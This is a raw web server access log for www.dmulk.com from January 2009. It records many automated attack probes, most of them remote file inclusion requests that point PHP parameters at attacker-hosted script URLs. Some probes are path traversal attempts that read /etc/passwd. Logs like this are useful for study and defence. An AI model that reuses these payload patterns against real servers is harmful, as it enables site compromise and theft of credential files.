211.235.245.121 - - [04/Jan/2009:09:16:35 -0800] "GET /logs/access_080702.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:16:36 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 200 95188 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:16:36 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:16:37 -0800] "GET /logs/access_081105.log%20%20/homepage.php?sel=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:16:37 -0800] "GET /logs/access_080702.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:16:39 -0800] "GET /logs/access_080702.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:09:16:49 -0800] "GET /logs/access_080330.log/!scanhttp://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:09:16:49 -0800] "GET /!scanhttp://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:09:16:49 -0800] "GET /logs/!scanhttp://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
94.23.7.173 - - [04/Jan/2009:09:16:52 -0800] "GET /logs/access_081209.log//?mosConfig_absolute_pathhttp://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:16:56 -0800] "GET /logs/access_080806.log//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:16:56 -0800] "GET /citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:17:03 -0800] "GET /logs/access_081101.log%20%20//guestbook1//admin.php?include_path=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:07 -0800] "GET /logs//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:07 -0800] "GET /logs/access_080806.log//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:07 -0800] "GET /citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
62.193.232.118 - - [04/Jan/2009:09:17:10 -0800] "GET /logs/access_080823.log/index.php?meio=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:15 -0800] "GET /logs/access_080806.log//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:15 -0800] "GET /citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:15 -0800] "GET /logs//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:16 -0800] "GET /logs//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:09:17:22 -0800] "GET /logs/access_080707.log/index.php?opcao=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:09:17:22 -0800] "GET /logs/index.php?opcao=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:09:17:22 -0800] "GET /logs/access_080831.log/index.php?opcao=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:09:17:23 -0800] "GET /index.php?opcao=http://plainsimple.org/test/id.txt????? HTTP/1.1" 200 94759 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:26 -0800] "GET /logs/access_080806.log//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:26 -0800] "GET /citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:26 -0800] "GET /logs//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:26 -0800] "GET /citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:26 -0800] "GET /logs/access_080806.log//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:26 -0800] "GET /logs//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:17:27 -0800] "GET /logs/access_080831.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:28 -0800] "GET /logs//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:28 -0800] "GET /logs/access_080806.log//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:28 -0800] "GET /citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:40 -0800] "GET /logs/access_080512.log//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:47 -0800] "GET /logs/access_080512.log//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:17:52 -0800] "GET /logs/access_080512.log//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:18:06 -0800] "GET /logs/access_080512.log//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:09:18:07 -0800] "GET /logs/access_080720.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:18:13 -0800] "GET /logs/access_080512.log//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:18:15 -0800] "GET /logs/access_080512.log//citywriter/head.php?path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
200.71.60.16 - - [04/Jan/2009:09:18:38 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:18:42 -0800] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:18:42 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:18:42 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:18:42 -0800] "GET /logs/access_080509.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.58.12 - - [04/Jan/2009:09:18:49 -0800] "GET /logs/access_081118.log/?_zb_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [04/Jan/2009:09:18:50 -0800] "GET /?_zb_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 200 95022 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [04/Jan/2009:09:18:51 -0800] "GET /logs/?_zb_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 200 80886 "-" "libwww-perl/5.65" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:18:55 -0800] "GET /logs/access_080831.log/index.php?opcao=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:18:55 -0800] "GET /logs/index.php?opcao=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:18:55 -0800] "GET /logs/access_080707.log/index.php?opcao=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:18:56 -0800] "GET /index.php?opcao=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 94775 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:09:19:08 -0800] "GET /logs/access_080810.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:09:19:20 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:09:19:20 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:19:22 -0800] "GET /logs/access_081028.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:19:22 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:19:25 -0800] "GET /logs/access_080601.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:19:26 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:19:27 -0800] "GET /logs/access_080903.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
89.111.173.117 - - [04/Jan/2009:09:19:39 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [04/Jan/2009:09:19:39 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.160.185.20 - - [04/Jan/2009:09:19:41 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.189.134.4 - - [04/Jan/2009:09:19:45 -0800] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.189.134.4 - - [04/Jan/2009:09:19:46 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:19:54 -0800] "GET /logs/access_081022.log//guestbook1//admin.php?include_path=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:09:19:55 -0800] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:09:19:55 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:20:00 -0800] "GET /logs/access_080702.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
62.193.232.118 - - [04/Jan/2009:09:20:07 -0800] "GET /logs/index.php?meio=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.232.118 - - [04/Jan/2009:09:20:08 -0800] "GET /index.php?meio=../../../../../../../../../../etc/passwd HTTP/1.1" 200 94789 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:20:24 -0800] "GET /logs/access_081028.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:20:24 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:20:24 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:20:34 -0800] "GET /logs/access_080903.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:09:20:39 -0800] "GET /logs/access_080118.log///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:20:43 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:20:43 -0800] "GET /logs/access_080903.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:20:43 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:20:58 -0800] "GET /logs/access_081028.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:20:59 -0800] "GET /logs/access_080702.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:21:04 -0800] "GET /logs/access_080903.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:21:04 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:21:04 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
190.3.25.99 - - [04/Jan/2009:09:21:09 -0800] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.160.185.20 - - [04/Jan/2009:09:21:12 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:21:16 -0800] "GET /logs/access_080714.log/home.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:21:16 -0800] "GET /logs/home.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:21:17 -0800] "GET /logs/access_081028.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:09:21:18 -0800] "GET /logs/access_080720.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:21:27 -0800] "GET /logs/access.log/home.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:21:34 -0800] "GET /logs/access_080702.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:22:07 -0800] "GET /logs/access_080903.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.51.31 - - [04/Jan/2009:09:22:12 -0800] "GET /blog/index.php/comments/feed/ HTTP/1.1" 200 5051 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:22:14 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://spass.huneck.eu/id/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:22:14 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://spass.huneck.eu/id/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:22:14 -0800] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://spass.huneck.eu/id/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:22:26 -0800] "GET /logs/access_080702.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:09:22:33 -0800] "GET /logs/access_080503.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
